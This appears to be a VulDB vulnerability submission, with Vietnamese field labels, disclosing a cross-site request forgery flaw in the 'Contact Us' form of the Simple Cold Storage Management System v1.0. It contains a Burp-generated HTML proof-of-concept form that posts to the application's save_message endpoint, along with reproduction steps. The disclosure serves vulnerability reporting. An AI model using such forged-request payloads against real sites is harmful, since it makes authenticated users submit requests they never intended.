| tiêu đề | Simple Cold Storage Management System - CSRF in Contact Us form |
|---|
| Mô tả | # Exploit Title: Simple Cold Storage Management System v1.0 - CSRF in "Contact Us"
# Exploit Author: Sourav Kumar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache
Description:It is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated. CSRF attacks exploit the trust a Web application has in an authenticated user.
Vulnerable Parameters:
Contact Us
Payload:
'
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/csms/classes/Master.php?f=save_message" method="POST" enctype="multipart/form-data">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="as" />
<input type="hidden" name="contact" value="885665" />
<input type="hidden" name="email" value="kittukumar267@gmail.com" />
<input type="hidden" name="message" value="seht" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Steps:
1) Go to Contact us page - http://localhost/csms/?page=contact_us
2) Now fill the form
3) Now intercept the post request with burp suite
4) Then Generate CSRF Payload PoC
5) Open the HTML Payload in browser
6) You will receive this message {"status":"success","msg":"Your message has successfully sent."}
|
|---|
| Nguồn | ⚠️ https://github.com/souravkr529/CSRF-in-Cold-Storage-Management-System/blob/main/PoC |
|---|
| Người dùng | Sourav529 (UID 33985) |
|---|
| Đệ trình | 18/10/2022 11:14 (cách đây 4 những năm) |
|---|
| Kiểm duyệt | 18/10/2022 11:42 (28 minutes later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 211194 [SourceCodester Simple Cold Storage Management System 1.0 Contact Us /csms/?page=contact_us Giả mạo yêu cầu liên trang] |
|---|
| điểm | 20 |
|---|